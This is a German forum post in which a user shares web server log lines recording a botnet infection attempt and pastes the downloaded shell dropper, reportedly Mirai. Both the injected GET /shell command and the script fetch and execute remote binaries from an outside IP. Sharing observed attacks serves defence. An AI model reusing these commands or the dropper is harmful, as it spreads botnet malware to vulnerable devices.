Menü
Avatar von Stephan Goll
  • Stephan Goll

mehr als 1000 Beiträge seit 18.01.2000

mag jemand mit ein paar Blackhats spielen?

Im Log meines Webservers fand ich heute ein paar lustige Einträge.

156.203.51.117 - - [25/Jul/2018:00:13:29 +0100] "GET /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo HTTP/1.1" 400 173 "-" "Gemini/2.0"
156.213.251.52 - - [25/Jul/2018:02:10:52 +0100] "GET /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo HTTP/1.1" 400 173 "-" "Gemini/2.0"
197.57.203.130 - - [25/Jul/2018:02:14:20 +0100] "GET /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo HTTP/1.1" 400 173 "-" "Gemini/2.0"

Der Kram ist unversteckt und offen zu finden unter:

> http://199.195.254.118/
bzw.
> http://199.195.254.118/jaws

Die Verursacher sind in Gizeh, Ägypten, gehostet wird der Kram in Cheyenne, Wyoming. Mir ist zu warm und ich hab auch gerade keine Lust ... und ich habe gerade auch keinen Kontakt zu irgendwelchen Virenjägern.

Disklaimer: der Code ist vermutlich schädlich.
--
Stephan
PS: ../jaws wurde wohl gerade gelöscht: Daher hier der Inhalt des Scriptes:

#!/bin/sh n="arm.gemini arm7.gemini x86.gemini" http_server="199.195.254.118" for a in $n do wget http://$http_server/sister/$a -O -> /tmp/$a chmod 777 /tmp/$a /tmp/$a selfrep.jaws done for a in $n do rm -rf /tmp/$a done

PPS: Virustotal sagt, es wäre wahrscheinlich Mirai.

Das Posting wurde vom Benutzer editiert (26.07.2018 00:18).

Bewerten
- +
Anzeige